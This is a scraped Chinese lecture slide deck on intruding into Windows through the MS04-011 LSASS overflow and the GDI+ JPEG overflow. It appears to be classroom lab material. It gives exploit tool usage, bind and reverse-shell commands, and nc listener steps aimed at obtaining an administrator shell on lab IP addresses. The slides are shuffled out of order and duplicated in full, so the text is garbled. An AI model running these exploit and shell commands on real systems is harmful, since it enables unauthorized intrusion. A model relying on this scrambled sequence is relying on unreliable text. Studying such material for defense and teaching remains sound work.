【计算机系统安全】23实例-基于操作系统漏洞的入侵
合集下载
相关主题
- 1、下载文档前请自行甄别文档内容的完整性,平台不提供额外的编辑、内容补充、找答案等附加服务。
- 2、"仅部分预览"的文档,不可在线预览部分如存在完整性等问题,可反馈申请退款(可完整预览的文档不适用该条件!)。
- 3、如文档侵犯您的权益,请联系客服反馈,我们会尽快为您处理(人工客服工作时间:9:00-18:30)。
虚拟机guest( 192.168.61.128)攻击host ( 192.168.61.1 )
13
绑定端口
• 打开命令窗口,输入ms04011 1 192.168.61.1 1234
14
Nc连接
• 溢出后 nc -vv 192.168.61.1 1234
15
反弹方式-Nc等待连接
• 使用nc在本地打开端口等待连接nc -l -p 8888(l表示 监听模式,p设置本地端口)
Windows GDI+JPG漏洞(交互类)
• 受影响版本xp+sp1,2003 • Windows图形设备接口(GDI+)是为用户提供在屏 幕和打印机上显示信息的API • GDI+(Gdiplus.dll)在处理畸形JPEG文件存在缓 冲区溢出
1
检测
• 使用gdiscan_gui.exe对本地系统检测 • 使用X-scan检查远程主机是否为受影响系统
16
溢出
• Ms04011 1 192.168.61.1 8888 192.168.61.128
17
使用xscan,扫描模块选取NetBios信息
12
工具ms04011
• 用法 ms04011 0 targetip (Port ConnectBackIP ) ----> attack 2k (tested on cn sp4,en sp4) ms04011 1 targetip (Port ConnectBackIP ) ----> attack xp (tested on cn sp1) ms04011 2 targetip (Port ConnectBackIP ) ----> attack xp (untested on cn sp0)
4
Nc连接
• 溢出后 nc -v 192.168.19.1 1542(v显示详细信息)
5
反弹方式
• jpeg_exploit -r 192.168.19.128 -p 8888 test.jpg • 传送test.jpg给远程机器
6
Nc等来自百度文库连接
• 使用nc在本地打开端口等待连接nc -l -p 8888(l表示 监听模式,p设置本地端口)
7
溢出
• 远程机器打开图片,溢出后将主动连接8888 端口,溢出成功将获得管理员权限的shell
8
Windows Lsasrv.dll RPC [ms04011]缓冲区移出
漏洞
• 受影响版本xp+sp1,2000
9
检测漏洞
使用DSSan
10
检测操作系统1
使用getos
11
检测操作系统2
2
工具jpeg_exploit
• 用法 jpeg_exploit -r your_ip | -b [-p port] <jpeg_filename> • r表示反弹连接攻击,b表示绑定端口攻击
3
绑定端口
• 打开命令窗口,输入jpeg_exploit -b -p 1542 myjpg.jpg • 传送myjpg.jpg给远程机器,远程机器打开图片
13
绑定端口
• 打开命令窗口,输入ms04011 1 192.168.61.1 1234
14
Nc连接
• 溢出后 nc -vv 192.168.61.1 1234
15
反弹方式-Nc等待连接
• 使用nc在本地打开端口等待连接nc -l -p 8888(l表示 监听模式,p设置本地端口)
Windows GDI+JPG漏洞(交互类)
• 受影响版本xp+sp1,2003 • Windows图形设备接口(GDI+)是为用户提供在屏 幕和打印机上显示信息的API • GDI+(Gdiplus.dll)在处理畸形JPEG文件存在缓 冲区溢出
1
检测
• 使用gdiscan_gui.exe对本地系统检测 • 使用X-scan检查远程主机是否为受影响系统
16
溢出
• Ms04011 1 192.168.61.1 8888 192.168.61.128
17
使用xscan,扫描模块选取NetBios信息
12
工具ms04011
• 用法 ms04011 0 targetip (Port ConnectBackIP ) ----> attack 2k (tested on cn sp4,en sp4) ms04011 1 targetip (Port ConnectBackIP ) ----> attack xp (tested on cn sp1) ms04011 2 targetip (Port ConnectBackIP ) ----> attack xp (untested on cn sp0)
4
Nc连接
• 溢出后 nc -v 192.168.19.1 1542(v显示详细信息)
5
反弹方式
• jpeg_exploit -r 192.168.19.128 -p 8888 test.jpg • 传送test.jpg给远程机器
6
Nc等来自百度文库连接
• 使用nc在本地打开端口等待连接nc -l -p 8888(l表示 监听模式,p设置本地端口)
7
溢出
• 远程机器打开图片,溢出后将主动连接8888 端口,溢出成功将获得管理员权限的shell
8
Windows Lsasrv.dll RPC [ms04011]缓冲区移出
漏洞
• 受影响版本xp+sp1,2000
9
检测漏洞
使用DSSan
10
检测操作系统1
使用getos
11
检测操作系统2
2
工具jpeg_exploit
• 用法 jpeg_exploit -r your_ip | -b [-p port] <jpeg_filename> • r表示反弹连接攻击,b表示绑定端口攻击
3
绑定端口
• 打开命令窗口,输入jpeg_exploit -b -p 1542 myjpg.jpg • 传送myjpg.jpg给远程机器,远程机器打开图片